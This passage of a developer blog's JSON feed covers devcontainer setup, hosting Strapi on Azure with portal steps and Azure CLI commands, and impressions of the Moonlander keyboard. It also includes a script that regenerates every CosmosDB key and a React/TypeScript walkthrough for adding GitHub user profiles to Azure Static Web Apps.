postCreateCommand to my devcontainer.json file that does npm install, so all my dependencies are installed when the container starts up (if you’re using yarn, then make the command yarn install instead).\nAnother useful thing you can do is setup some VS Code Tasks so that you can run the different commands (like dev, start, build) rather than using the terminal, but that’s somewhat personal preference so I’ll leave it as an exercise for the reader.\nAnd with that done, you’re dev environment is ready to go, use the command pallette to reopen VS Code in a container and you’re all set.\nConclusion I know that this series is called “Keystone on Azure” and we didn’t do anything with Azure, but I thought it was important to get ourselves setup and ready to go so that when we are ready to work with Azure, it’s as easy as can be.\n", "id": "2021-11-02-keystone-on-azure-part-1-local-dev" }, { "title": "Host Strapi 3 on Azure", "url": "https://www.aaron-powell.com/posts/2021-10-14-host-strapi-3-on-azure/", "date": "Thu, 14 Oct 2021 23:15:02 +0000", "tags": [ "javascript", "azure", "graphql" ], "description": "Curious on how to run Strapi 3 on Azure without learning about VM's, check this out then!", "content": "I originally contributed the following as a guide for the official Strapi docs, but as they are working on v4 of Strapi at the moment, I figured it would still be good to include somewhere, so here it is on my blog! As a result, the layout of the content won’t be my normal blog style, it’s more documtation-esq, but it should still do the job.\nIf you’re new to Strapi, Strapi is a headless CMS that you would host somewhere and use their API to pull the content into an application, be it a SPA in your favourite JavaScript framework, a mobile app, or something else.\nThese guides are tested against the v3 release of Strapi, as v4 is in beta at the time of writing. 
It’s likely that much of the content covered here will be applicable for v4; the only thing I expect to change is how to use the file upload provider, and I’m unsure if the existing plugin will work with v4.\nAzure Install Requirements You must have an Azure account before doing these steps. Table of Contents Create resources using the portal Create using the Azure CLI Create Azure Resource Manager template Storing files and images with Azure Storage Required Resources There are three resources in Azure that are required to run Strapi in a PaaS model: AppService to host the Strapi web application, Storage to store images/uploaded assets, and a database; Azure has managed MySQL and Postgres to choose from (for this tutorial, we’ll use MySQL, but the steps are the same for Postgres).\nCreating Resources via the Azure Portal In this section we’ll use the Azure Portal to create the required resources to host Strapi.\nNavigate to the Azure Portal\nClick Create a resource and search for Resource group from the provided search box\nProvide a name for your Resource Group, my-strapi-app, and select a region\nClick Review + create then Create\nNavigate to the Resource Group once it’s created, click Create resources and search for Web App\nEnsure the Subscription and Resource Group are correct, then provide the following configuration for the app:\nName - my-strapi-app Publish - Code Runtime stack - Node 14 LTS Operating System - Linux Region - Select an appropriate region Use the App Service Plan to select the appropriate Sku and size for the level of scale your app will need (refer to the Azure docs for more information on the various Sku and sizes)\nClick Review + create then Create\nNavigate back to the Resource Group and click Create then search for Storage account and click Create\nEnsure the Subscription and Resource Group are correct, then provide the following configuration for the storage account:\nName - my-strapi-app Region - Select an appropriate region Performance - Standard Redundancy - Select the appropriate level of redundancy for your files Click Review + create then Create\nNavigate back to the Resource Group and click Create then search for Azure Database for MySQL and click Create\nSelect Single server for the service type\nEnsure the Subscription and Resource Group are correct, then provide the following configuration for the database:\nName - my-strapi-db Data source - None (unless you’re wanting to import from a backup) Location - Select an appropriate region Version - 5.7 Compute + storage - Select an appropriate scale for your requirements (Basic is adequate for many Strapi workloads) Enter a username and password for the Administrator account, click Review + create then Create\nConfiguring the Resources Once all the resources are created, you will need to get the connection information for the MySQL and Storage account to the Web App, as well as configure the resources for use.\nConfigure the Storage Account Navigate to the Storage Account resource, then Data storage - Containers Create a new Container, provide a Name, strapi-uploads, and set Public access level to Blob, then click Create Navigate to Security + networking - Access keys, copy the Storage account name and key1 Navigate to the Web App you created and go to Settings - Configuration Create new application settings for the Storage account, storage account key and container name (these will become the environment variables available to Strapi) and click Save Configure MySQL Navigate to the MySQL resource then
Settings - Connection security\nSet Allow access to Azure services to Yes and click Save\nNavigate to Overview and copy Server name and Server admin login name\nOpen the Azure Cloud Shell and log into the mysql cli:\nmysql --host <server> --user <username> -p Create a database for Strapi to use CREATE DATABASE strapi; then close the Cloud Shell\nOptional - create a separate non server admin user (see this doc for guidance) Navigate to the Web App you created and go to Settings - Configuration\nCreate new application settings for the Database host, username and password (these will become the environment variables available to Strapi) and click Save\nCreating Resources via the Azure CLI In this section, we’ll use the Azure CLI to create the required resources. This will assume you have some familiarity with the Azure CLI and how to find the right values.\nCreate a new Resource Group\n1 2 3 rgName=my-strapi-app location=westus az group create --name $rgName --location $location Create a new Linux App Service Plan (ensure you change the number-of-workers and sku to meet your scale requirements)\n1 2 appPlanName=strapi-app-service-plan az appservice plan create --resource-group $rgName --name $appPlanName --is-linux --number-of-workers 4 --sku S1 --location $location Create a Web App running Node.js 14\n1 2 webAppName=my-strapi-app az webapp create --resource-group $rgName --name $webAppName --plan $appPlanName --runtime "node|10.14" Create a Storage Account\n1 2 3 4 5 6 7 8 9 saName=mystrapiapp az storage account create --resource-group $rgName --name $saName --location $location # Get the access key saKey=$(az storage account keys list --account-name $saName --query "[?keyName=='key1'].value" --output tsv) # Add a container to the storage account container=strapi-uploads az storage container create --name $container --public-access blob --access-key $saKey --account-name $saName Create a MySQL database\n1 2 3 4 5 6 7 8 9 10 11 12 13 serverName=my-strapi-db dbName=strapi username=strapi password=... 
# Create the server az mysql server create --resource-group $rgName --name $serverName --location $location --admin-user $username --admin-password $password --version 5.7 --sku-name B_Gen5_1 # Create the database az mysql db create --resource-group $rgName --name $dbName --server-name $serverName # Allow Azure resources through the firewall az mysql server firewall-rule create --resource-group $rgName --server-name $serverName --name AllowAllAzureIps --start-ip-address 0.0.0.0 --end-ip-address 0.0.0.0 Add configuration values to the Web App\n1 2 3 4 5 6 az webapp config appsettings set --resource-group $rgName --name $webAppName --setting STORAGE_ACCOUNT=$saName az webapp config appsettings set --resource-group $rgName --name $webAppName --setting STORAGE_ACCOUNT_KEY=$saKey az webapp config appsettings set --resource-group $rgName --name $webAppName --setting STORAGE_ACCOUNT_CONTAINER=$container az webapp config appsettings set --resource-group $rgName --name $webAppName --setting DATABASE_HOST=$serverName.mysql.database.azure.com az webapp config appsettings set --resource-group $rgName --name $webAppName --setting DATABASE_USERNAME=$username@$serverName az webapp config appsettings set --resource-group $rgName --name $webAppName --setting DATABASE_PASSWORD=$password Deploy with an Azure Resource Manager template To deploy using an Azure Resource Manager template, use the button below, or upload this template as a custom deployment in Azure.\nStoring files and images As AppService is a PaaS hosting model, an upload provider will be required to save the uploaded assets to Azure Storage. Check out https://github.com/jakeFeldman/strapi-provider-upload-azure-storage for more details on using Azure Storage as an upload provider.\nLocal development For local development, you can either use the standard Strapi file/image upload provider (which stores files on the local disk), or the Azurite emulator.\nDeploying and running Strapi Azure AppService can be deployed to using CI/CD pipelines or via FTPS; refer to the Azure docs on how to do this in your preferred manner.\nTo start the Node.js application, AppService will run the npm start command. As there is no guarantee that the symlinks created by npm install were preserved (in the case of an upload from a CI/CD pipeline) it is recommended that the npm start command directly references the Strapi entry point:\n1 2 3 "scripts": { "start": "node node_modules/strapi/bin/strapi.js start" } Conclusion This has been a look at how we can use the different PaaS features of Azure to host Strapi, and the different ways in which you can set up those resources.
I prefer to use the Resource Manager template myself, and then configure GitHub Actions as the CI/CD pipeline so that deployments all happen smoothly in the future.\nHopefully this makes it easier for you to also get your Strapi sites running in Azure, and once Strapi 4 is out, I’ll get some updated content on the differences that you need to be aware of when hosting in Azure.\n", "id": "2021-10-14-host-strapi-3-on-azure" }, { "title": "ZSA Moonlander - One Month On", "url": "https://www.aaron-powell.com/posts/2021-09-01-zsa-moonlander-one-month-on/", "date": "Wed, 01 Sep 2021 06:20:44 +0000", "tags": [ "keyboard" ], "description": "It's been a month since I got my Moonlander, so how's it all going?", "content": "A month ago I got myself a ZSA Moonlander keyboard as a replacement for my aging Microsoft Natural 4000, and I wrote about my first few days with it.\nNow that a month has passed, I thought it might be a good idea to give an update on how I’ve been finding it, and what I’ve learnt, for anyone else who might be considering a similar keyboard journey.\nCorrection from last post First up, I need to make a correction from my previous post. In it I said that the keyboard is an ortholinear layout, which was incorrect. The Moonlander is a Columnar layout, which is similar to ortholinear but with a slight difference. In an ortholinear layout the keys are in a strict grid, with no offset between the keys, as you can see in ZSA’s Planck EZ:\nColumnar is similar in that the keys are aligned in a series of vertical columns, each key is inline with the one directly above it, but the columns are vertically offset from each other to match the finger length of the finger that is meant to use that column. So the column for the middle finger goes up higher than any others, as it’s the longest finger and can stretch further up without going down as far as, say, a pinky.\nLearning a new keyboard layout With that correction sorted, what’s it like? I’ve been using staggered all my life, it’s what all stock keyboards are, it’s how virtually every third-party keyboard is created, so using something different is… interesting.\nAfter about a week I found myself pretty much back up to speed on what would be a usual typing session, one that consisted of words not code, but I wasn’t really making any use of the columnar layout.\nThis results in a lot of lazy habits on the keyboard and not really getting the maximum value: reduced joint stress through simplified movement. For the last week I’ve started to undo that by doing daily typing lessons over at keybr.com.\nIf you want to try and feel dumb about typing, I’d highly recommend trying something like that out. I’m finding that I’m averaging low 20s in my words-per-minute, sometimes peaking at 30, but that’s somewhat rare (and generally error prone).\nSo, has it been worth it so far? I think so. While I do feel like a fool a lot of the time when I’m typing, what I have noticed is that when I get into a typing rhythm and start really using the layout to its advantages (up/down finger movements rather than side to side) it feels really nice. Like, really nice. I’m not sure how to really describe it, but not having anything more than my fingers making some very minor movements makes the typing seem to flow a lot smoother.\nWhat I have noticed though is that my left hand has picked this up a lot faster than my right hand.
This may be because I’m left handed (but really only for writing, everything else I’ve trained myself to do right handed), but I’m really struggling to get my right hand to move beyond using only one or two fingers without a lot of thinking about it. Maybe after a few more weeks of typing practice that’ll change.\nRelearning typing with reading difficulties Somewhat of a side point, but very much related to learning to type is something I never considered, the impact my reading difficulties would have.\nI’m someone who struggles to read, this is partially why I tend not to write notes when presenting, I can’t read them on the fly. It’s possible that I’ve got some form of dyslexia, but as I’ve never been diagnosed I don’t like to apply a label. What I know is that when I see letters and words, it’s often not in the order they are meant to be.\nThis makes for a challenge when it comes to relearning to type. Whether I’m using keybr or the typing training from ZSA, it’s a challenge because I need to read what’s on screen, process it correctly and then type it out exactly. But since I’ll often read it incorrectly, what I type might be what I read but wasn’t what was originally on screen. Because of this, I find writing, such as doing this blog, just as valuable, if not more, because I’m not trying to retype someone elses words, I’m bringing my own.\nSo if you’re looking to relearn how to type, take into consideration how you go about processing words to be able to type them back out.\nI have found keybr.com both a positive and a negative as it doesn’t really use words, more collections of letters to learn patterns. As they aren’t words I don’t do as much “fill in the blanks” as I do on other typing practice, but also as they aren’t words I have trouble focusing on what I’m aiming to type. I’d suggest trying a few services to find what’s right for you.\nLayers One thing about this keyboard, like many smaller keyboards, is that they use layers to give you access to the keys you’re dropping.\nThis has taken a lot of work to get use to, and I find that it’s a large cognitive effort to use them effectively. I think this is also resulting in an increased usage of the mouse. I was someone who was very keyboard orientated for navigation around tools, but I’ve been using the mouse a bit more as I’ve trying to retrain the finger dance to get shortcuts to work.\nIf you look at the keyboard layout I’m using most of the symbol keys are across two layers, with layer 1 being common coding symbols and layer 2 being punctuation. In the first few days, I found myself moving keys around a fair bit, but after about a week I settled down and the only changes were to make some symbols more accessible to my left hand.\nAs a result, when doing coding, I do find that I have to think more about the dance my hands need to take before I take it. I don’t doubt that this will improve over time with practice, I already find some symbols easier to get without looking (such as the ones for markdown!) but for now coding is still a bit of a chore.\nKey switches As this is a mechanical keyboard, I’ve delved into the wonderful world of “OMG why is this so complicated!” when it comes to how you want the keys to feel and sound. When I got the keyboard I had Kailh Gold switches in, which are super clacky to type on. After a few weeks (and the odd sideways death look from my wife 😝) I decided to move the letter keys over to the Cherry MX Brown switches. 
These are much quieter to type on, have more of a thunk than a high pitched clack when you type, and that’s probably better in an office/shared workspace.\nBut do I notice any difference? Sort of. I’ll admit that the Gold’s do feel a lot nicer to type on, they are super responsive and feel very fast as I type. That’s not to say that the Brown’s feel sluggish or anything, they are more than adequate to type on, they just don’t feel quite as nice.\nOnce we are no longer having to home school, COVID restrictions lift so my wife can work again and our new house is built (in which I’ve installed sound proofing in the office) I’ll probably switch back to the Gold’s for all keys. For the time being though, I have the clack only when I’m using a non-letter key (which does help a bit in learning which key is where, as I have audible feedback).\nKeyboard position When I first started with the keyboard, here’s how I had it on the desk:\nFour weeks later and here’s the position:\nThe position of the keyboard is much wider now, it’s about the full width of my shoulders, and it feels pretty comfortable at that width. This has also resulted it me using my chair arm rests less than I use to, which I didn’t expect. I’ve also lowered the height of my desk, even when I’m in standing position, as I haven’t found a need to bring my hands up as high.\nThere is a downside of this layout is that I can’t quite work out where to put my mouse. Previously, the mouse was sitting at about shoulder alignment of my right arm (I use the mouse right handed, even though I identify as as lefty), but now I have half a keyboard there, so the mouse ends up sitting either between the two halves, or way off to the right. I’m still not sure how to do this better (and I can’t get use to the keyboard-driven mouse control…), so we’ll see what happens to the mouse long-term.\nConclusion One month in, typing is not back to where it once was, but I’m still happy with the keyboard.\nI’m enjoying the wider set of my hands and I’m feeling better through my back and shoulders as a result. I also feel like I have a better posture while typing (I still slouch massively when I’m not typing 🤫), which I wasn’t really expecting.\nMy plan is to keep going with typing lessons for a while to try and get better at using the Columnar layout and reduce the overall hand movement while typing, instead just using finger movements. I’ve already noticed how much better that feels on my left hand, so my hope is that I can get my right hand to follow suite.\nI get that this isn’t for everyone, but if you are someone who has wrist or shoulder pain, consider the role that your keyboard may be playing in that and look into something like the Moonlander as an option.\n", "id": "2021-09-01-zsa-moonlander-one-month-on" }, { "title": "Regenerate All CosmosDB Keys", "url": "https://www.aaron-powell.com/posts/2021-08-31-regenerate-all-cosmosdb-keys/", "date": "Tue, 31 Aug 2021 00:56:52 +0000", "tags": [ "azure" ], "description": "Here's how to regen all your keys for CosmosDB", "content": "A few days ago a vulnerability in CosmosDB was announced that allows attackers to access the access keys and thus get into a database.\nWhile Microsoft has disabled the feature that was allowing for the vulnerability, it is strongly recommended that everyone regenerate their access keys. 
But if you’ve got multiple databases, this can be a slow process.\nSo, here’s a handy script that will do it for you, using the Azure CLI:\n1 2 3 4 5 info=$(az cosmosdb list --query "[].{ name: name, resourceGroup: resourceGroup }" -o tsv) echo $info | xargs -L1 bash -c 'az cosmosdb keys regenerate --key-kind primary --name $0 -g $1' echo $info | xargs -L1 bash -c 'az cosmosdb keys regenerate --key-kind primaryReadonly --name $0 -g $1' echo $info | xargs -L1 bash -c 'az cosmosdb keys regenerate --key-kind secondary --name $0 -g $1' echo $info | xargs -L1 bash -c 'az cosmosdb keys regenerate --key-kind secondaryReadonly --name $0 -g $1' You’ll still need to get the keys and update your apps to use the new keys, but this will at least get them all cycled for you!\n", "id": "2021-08-31-regenerate-all-cosmosdb-keys" }, { "title": "Keyboard First Impressions - ZSA Moonlander", "url": "https://www.aaron-powell.com/posts/2021-07-29-keyboard-first-impressions-zsa-moonlander/", "date": "Thu, 29 Jul 2021 00:36:45 +0000", "tags": [ "keyboard" ], "description": "I decided to upgrade my keyboard to a split layout, here's my first impressions", "content": "Keyboards: as software developers, they’re something we use daily, and for extended periods of time. But it’s not something that I’ve ever really spent much time thinking about, or the role that it plays in how I work.\nOne of the first keyboards I remember using was a huge beige thing with a curly cable into the 9-pin port. Then, as I started working it was just whatever keyboard I had at work, basic keyboards that you’re likely familiar with from corporate environments. When I started consulting and speaking, my main machine was a laptop and because I didn’t want to drag keyboards around to client sites, I would just use the keyboard on my laptop… and I loved those. Probably my favourite laptop keyboard is the Surface Book 2, followed closely by the Surface Pro type cover.\nWith last year seeing me move to full time working from home, I got myself a desktop and with that I needed an external keyboard.\nThankfully, I did have one that I’d used on and off, a Microsoft Natural 4000!\nMy first ergonomic keyboard I bought this keyboard about a decade ago, on my first trip to Microsoft as an MVP, mainly on a whim, but it’s mostly sat on the shelf collecting dust (due to the above mentioned reasons for not using an external keyboard). Anyway, I dusted it off and have been using it for about 12 months now.\nThis was the first time I’d used an ergonomic keyboard and I didn’t really know why I wanted it other than “it seemed like a fun experiment”. It took a little bit to get used to but, generally speaking, it was no different to any other keyboard I’d used. The keys felt nice, but not anything special.\nUnfortunately, this is a 10 year old keyboard and it was starting to wear out, the wrist rests are starting to crack and peel, plus the years of dust collecting on it have made some of the keys a bit sticky at times.\nIt was time for a new keyboard.\nThe MS Natural 4000 is no longer available, so I needed to work out what I’d get as a replacement. Should I go with one of the current generation MS ergonomic keyboards, or should I go elsewhere?\nI’d seen a few people on Twitter talking about split keyboards, and that intrigued me, so I started to look at them. One model that kept popping up is the ZSA Moonlander.\nAfter some umm-ing and ahh-ing I decided to take the plunge and ordered it.\nWhy split?
So the first question you might have is, why a split keyboard?\nWell, I’m already kind of using a split keyboard, the position of the keys in the MS Natural 4000 are already curved and separated, compared to a standard keyboard. The next reason is ergonomics.\nI’m a tall person, and having a desk job means that I spend a lot of time in a less than idea ergonomic position and occasionally get shoulder and neck pain as a result (not to mention that I can pop most joints in my hands at will!). With a standard keyboard you tend to rotate your shoulders and hands in to use them, as seen when I use my laptop keyboard.\nSee how my arms are angled on and wrists have a curve in them (particularly the left).\nNow take a look at the hand position on the MS Natural 4000.\nHere my hands are a bit more spread and as a result my shoulders are more open, which is a more natural body position, but it’s still limited as I can’t move the keyboard any further apart than this and my wrists are still turned (it looks a bit weird in the photo due to the tenting on the keyboard making it not sit flat like the laptop one).\nIn a fully split keyboard, you can completely open up by moving each half of the keyboard to where is the most comfortable position for you.\nThis is the “optimal” position for the keyboard. Notice how my hands are in line with my shoulders, which is meant to be the ideal position for them. I’m not in a complete split yet, it’ll take time to get use to it.\nSo, what’s it like?\nFirst Impressions I’m on day four using it and if you’re following my Twitter stream you’ll have seen some of my journey, but here’s the highlights.\nMy First Mechanical Keyboard The ZSA Moonlander is a mechanical keyboard, which means you can feel superior to others by talking about different key switches, the pressure required for them, their pre-travel distance, etc.\nAs a newbie to this space I’ve gone with two sets of key switches. Currently, I have Kailh Gold in, which are a very light switch, but also a super loud one (clacking on both the up and down motion), so it’s probably a good thing I work from home (although right now we’re home schooling due to COVID, but my wife hasn’t said anything 😅 Update: my wife read this post and said “Oh, you can totally hear them. 🤣). I also have a set of Cherry MX Brown, which are apparently a great starting key switch, they aren’t too noisy, have a good feel, etc. I’ll give them a try after a few weeks, once I’m more use to the keyboard.\nDay 1 - I feel like an idiot The box arrived and I couldn’t believe how small it was!\nIt has a snazzy little carry case for if I take it travelling (cries in COVID).\nI slid my old keyboard off to the side and setup the Moonlander, plugged it in and it was time to get started.\nThe first thing I realised is that I wouldn’t be able to have it in the full split position, it was just too weird for me, so I brought the two halves a bit closer, more like the MS Natural, and now I could find where the keys were as I tried to type. It’s also an ortholinear layout, not staggered, meaning that the keys are lined up in vertical columns, unlike most keyboards, encouraging more up and down movement than side to side (here’s a good video talking of the differences and possible benefits of ortholinear).\nOne of the things that you can do with the Moonlander is customise the layout of the keyboard. Given I have less keys than before, no function row, no numpad, etc., if I want that functionality back in, I can customise it using their Oryx software. 
This was also useful as I had no idea what the keyboard layout originally was, like, where’s my Windows key, or backspace! It also supports the idea of keyboard layers, which is where you have different “modes” the keyboard can shift into, generally hitting some key, and changing what the keys do.\nThis was going to be a challenge…\nI started to play with Oryx but honestly, it’s super overwhelming. I have no idea what keyboard shortcuts I tend to use, which keys I hit frequently, etc. so trying to move things around just meant I ended up with a confusing keyboard layout (I deleted my Enter key at one point 🤣). Chad Tolkien, who gave me some good insights before I bought the keyboard, sent me a layout that he uses which includes some layers for coding. It was using Colemak, an alternative to QWERTY, so I modified it to be QWERTY and got going.\nTyping With my keyboard layout tweaked enough to get started, I began using it, and using a drastically different keyboard is a great way to learn just how many bad habits you have with typing.\nWhat I learn with my typing is that I rely heavily on my first and second fingers heavily, with my third sometimes coming into play and my pinky basically just being dead weight.\nI also learnt that my right hand is really sloppy at typing, and while my left was picking up the new key positions and what not, my right was full of incorrect characters. I’d made the choice the keep CTRL + Backspace next to the H key (from Chad’s layout), but I was constantly hitting it when meaning H, and I never realised how often I tried to type the letter H until I deleted the whole word with a single missed key… 😅\nThroughout the day I ran through the training exercises that Oryx providers and was hitting around 80% accuracy, but I was only getting about two lines into each of the pieces of text (maybe a dozen or so words) and that didn’t inspire confidence. I don’t know what my words-per-minute is, but I can crank out a blog post quick-smart if I need, so I’d say it’s better than the ~15 I was sitting at.\nYeah, I felt really dumb trying to type, but damnit, I’m going to learn!\nDay 2 - Feeling better On day 2 I started playing with the keyboard tenting, which is how you can raise the keyboard up. I like that the MS Natural 4000 wasn’t sitting flat on the desk and curved up at the middle, so I played around a bit with that on my Moonlander to get a position that felt right.\nI started doing more typing and it wasn’t feeling as horrible. I’ve got a talk upcoming so I did some work on the slides, which required some typing but nothing long, and I did some updating to my work backlog, general admin stuff, and things were feeling better.\nHere’s a video I posted on Twitter towards the end of day 2, showing me typing the tweet:\nWhile I retrain myself on how to type, I decided to setup a spare webcam to watch my hands as I go. 
This is totally trippy to watch yourself while your typing.\nBut hey, I get to see where my mistakes are!\n(video is of me typing this tweet, at double speed 🤣) pic.twitter.com/KfnByv7929\n— Aaron Powell (@slace) July 27, 2021 That tweet took about 45 seconds to type, which didn’t feel too bad… You’ll see me backspace a few times though!\nDay 3 - Coding After two days I felt like I was getting the hang of this usual typing stuff, it was time to do some coding.\nAaaaaaaaaaaaaaaand back to square one 🤣.\nI never realised how muscle memory I have in coding, where the symbols are, how to use tools like VS and VS Code, I just use them, I don’t even think.\nBut now I don’t have the symbol keys where I would expect them to be, I have layers that have them, and it’s just weird.\nThis is something that I’m likely going to keep playing with for a while, I need to work out what to put where, and how my fingers tend to think about movement, but I was able to struggle through what I wanted to do, even if I felt like it was taking absolutely ages.\nI now have some customised layers on the keyboard for VS Code and VS, containing the useful shortcuts that I use, but I do find the macro system in Oryx limiting, I wish I could have longer sets of keys so in VS Code I could do CTRL + P, TERM<SPACE> to access the terminal list, but I can only get it to do TERM. That’ll have to do for now.\nConclusion It’s been less than a week but when it comes to word-centric typing, I feel like I’m getting my stride back, coding is going to take a bit longer, mainly because there are so many variables (ha!) to that, but I’m sure I’ll get there (this week hasn’t been a code-centric week for me).\nI’m finding the mechanical nature of the keys nice, and I’d probably rate this above the Surface Book 2 keyboard. I’ll keep the Kailh Gold’s in for a few weeks before trying the Cherry MX Brown, although the clacky sound is growing on me.\nIf you’re interested in the keyboard layout I’m using, here it is, feel free to give it a try, I’ll keep tweaking it as I go.\nAnd of course, I have some lovely RGB involved, because if there’s no RGB, what’s the point!\n", "id": "2021-07-29-keyboard-first-impressions-zsa-moonlander" }, { "title": "Adding User Profiles to Static Web Apps", "url": "https://www.aaron-powell.com/posts/2021-07-16-adding-user-profiles-to-swa/", "date": "Fri, 16 Jul 2021 04:48:26 +0000", "tags": [ "javascript", "azure", "serverless" ], "description": "SWA gives you authentication, but without much of a user profile, so let's look at how to add that.", "content": "With Azure Static Web Apps we get a user profile as part of the security platform, but that profile is pretty limited, we get an ID for the user and something contextual from the authentication provider, like an email address or a username. This means that if we want to create a more enriched user profile, we need to do it ourselves.\nSo, let’s take a look at how we can do that. For this demo, I’m going to use the React SWA template, the npm package @aaronpowell/react-static-web-apps-auth and @aaronpowell/static-web-apps-api-auth. 
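For reference, the limited profile that SWA exposes (and that these packages unpack for us) has roughly this shape; this is just a sketch based on the /.auth/me response and the fields used later in this post, not code from the sample itself:
type ClientPrincipal = {
  identityProvider: string; // e.g. "github", used later to decide which profile API to call
  userId: string; // the opaque ID SWA assigns to the user
  userDetails: string; // for GitHub this is the username
  userRoles: string[]; // e.g. ["anonymous", "authenticated"]
};

// The endpoint returns { clientPrincipal: ClientPrincipal | null },
// with null meaning no one is logged in; the React Hook used below effectively wraps this call.
async function getClientPrincipal(): Promise<ClientPrincipal | null> {
  const res = await fetch("/.auth/me");
  const payload = await res.json();
  return payload.clientPrincipal;
}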
We’re also only going to use GitHub as the authentication provider, but the pattern displayed here is applicable to any authentication provider (you’d just need to figure out the appropriate APIs).\nAuthenticating a user First we’re going to need some way to log the user in, or at least, checking that they are logged in, so we’ll wrap the whole application in the ClientPrincipalContextProvider component:\n1 2 3 4 5 6 7 8 9 // updated index.jsx ReactDOM.render( <React.StrictMode> <ClientPrincipalContextProvider> <App /> </ClientPrincipalContextProvider> </React.StrictMode>, document.getElementById("root") ); Having this ContextProvider means that we’ll be able to use the useClientPrincipal React Hook (which the package ships with) to check if the user is logged in or not within our application, and that’ll be critical to make the right decisions throughout the app.\nLet’s rewrite the App component to use the useClientPrincipal hook:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 function App() { const details = useClientPrincipal(); if (!details.loaded) { return ( <section> <h1>Loading...</h1> </section> ); } // todo return null; } The loaded property of the Hook state is indicating whether or not we’re received a response from the /.auth/me endpoint, which is what we use to determine if someone is authenticated to our app, if they’re authenticated, we’ll get the standard profile back, if not, we’ll get a null profile. Once this has completed we can check for a clientPrincipal:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 function App() { const details = useClientPrincipal(); if (!details.loaded) { return ( <section> <h1>Loading...</h1> </section> ); } if (!details.clientPrincipal) { return <Login />; } // todo return null; } We’ll create a basic Login component that:\n1 2 3 4 5 6 7 8 function Login() { return ( <section> <h1>Login</h1> <StaticWebAuthLogins azureAD={false} twitter={false} /> </section> ); } This uses the component from @aaronpowell/react-static-web-apps-auth and disabled Azure AD and Twitter, which are part of the pre-configured providers.\nGetting the GitHub user info Before we can finish off the UI component, we need some way in which we can get the user’s information from GitHub. 
Let’s do that by adding a new API to our SWA:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import fetch, { Headers } from "node-fetch"; import { getUserInfo, isAuthenticated } from "@aaronpowell/static-web-apps-api-auth"; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { if (!isAuthenticated(req)) { context.res = { status: 401 }; return; } const userInfo = getUserInfo(req); const headers = new Headers(); headers.append("accept", "application/json"); headers.append("user-agent", "azure-functions"); headers.append( "authorization", `Basic ${Buffer.from( `${process.env.GitHubUsername}:${process.env.GitHubToken}` ).toString("base64")}` ); const res = await fetch( `https://api.github.com/users/${userInfo.userDetails}`, { headers } ); if (!res.ok) { const body = await res.text(); context.res = { status: res.status, body }; return; } const { login, avatar_url, html_url, name, company, blog, location, bio, twitter_username } = await res.json(); context.res = { body: { login, avatar_url, html_url, name, company, blog, location, bio, twitter_username } }; }; export default httpTrigger; The first thing this function is going to do is check that there is a logged in user, using the isAuthenticated function from the @aaronpowell/static-web-apps-api-auth package (you don’t need to do this if you configure SWA to require the call to be authenticated, but I tend to do it out of habit anyway).\nAssuming they are logged in, we’ll make a call to the GitHub API to get the user’s details. It’d be a good idea to provide an authentication token to do this, so you don’t get rate limited. Aside: I’m using Buffer.from("...").toString("base64") not btoa to do the encoding, as at the time of writing the API that SWA deploys runs Node.js ~12, and btoa was added to Node.js in ~14.\nHow do we know the user to access? The clientPrincipal that we get back has the userDetails field set to the GitHub username, so we can use that in the API call.\nAnd then assuming that’s successful, we’ll return the fields that are we care about back to the client.\n<GitHubIdentityContextProvider> We’re going to build a new React Context (+ Provider) so that we can finish off our App like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 function App() { const details = useClientPrincipal(); if (!details.loaded) { return ( <section> <h1>Loading...</h1> </section> ); } if (!details.clientPrincipal) { return <Login />; } return ( <GitHubIdentityContextProvider> <User /> </GitHubIdentityContextProvider> ); } We’ll create a new file called GitHubIdentityContextProvider.tsx and start creating our context provider:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import { useClientPrincipal } from "@aaronpowell/react-static-web-apps-auth"; import React, { createContext, useContext } from "react"; type GitHubUser = { login: string; avatar_url: string; html_url: string; name: string; company: string; blog: string; location: string; bio: string; twitter_username: string; }; const GitHubIdentityContext = createContext<GitHubUser | null>(null); First thing, let’s create a TypeScript type for the user, obviously skip this if you’re not using TypeScript.\nWe’ll then create our React Context using createContext and call it GitHubIdentityContext. 
We’re not going to export this from the module, as we don’t want people creating their own providers using it, we want to do that for them, so we can control how it populates the profile data.\nNow for the Context Provider:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 const GitHubIdentityContextProvider = ({ children }: any) => { const swaUser = useClientPrincipal(); const [githubUser, setGitHubUser] = React.useState<GitHubUser | null>(null); React.useEffect(() => { if (swaUser.loaded && swaUser.clientPrincipal) { fetch("/api/user-details") .then(res => res.json()) .then(setGitHubUser); } }, [swaUser]); return ( <GitHubIdentityContext.Provider value={githubUser}> {children} </GitHubIdentityContext.Provider> ); }; The GitHubIdentityContextProvider is a React Component, which uses the useClientPrincipal Hook and tracks the GitHub user details as local state. We’ll use an effect Hook to wait for the profile to be loaded, and if it has been, call the new API that we created earlier in this post (I called mine user-details). Unpack the response as JSON and push it into state, now we have the GitHub user info available to our client.\nLastly, we’ll create a custom Context Hook to expose this and export them from our module.\n1 2 3 const useGitHubUser = () => useContext(GitHubIdentityContext); export { GitHubIdentityContextProvider, useGitHubUser }; The <User /> component With the GitHub profile ready, we can create a <User /> component to render the information out:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 function User() { const githubUser = useGitHubUser(); if (!githubUser) { return null; } return ( <div> <h1>{githubUser.name}</h1> <h2> Works at {githubUser.company} in {githubUser.location} </h2> <p>{githubUser.bio}</p> <ul> <li> <a href={githubUser.html_url}>Profile</a> </li> <li> <a href={`https://twitter.com/${githubUser.twitter_username}`} > Twitter </a> </li> <li> <Logout /> </li> </ul> </div> ); } With a null check to ensure it isn’t used in the wrong place (and to satisfy the TypeScript compiler that we aren’t using a null object 😜) we can dump out the profile in whatever format we want.\nAnd there we have it, an Azure Static Web App with authentication provided by GitHub, along with a rich user profile.\nYou can check out the full sample on my GitHub, along with a 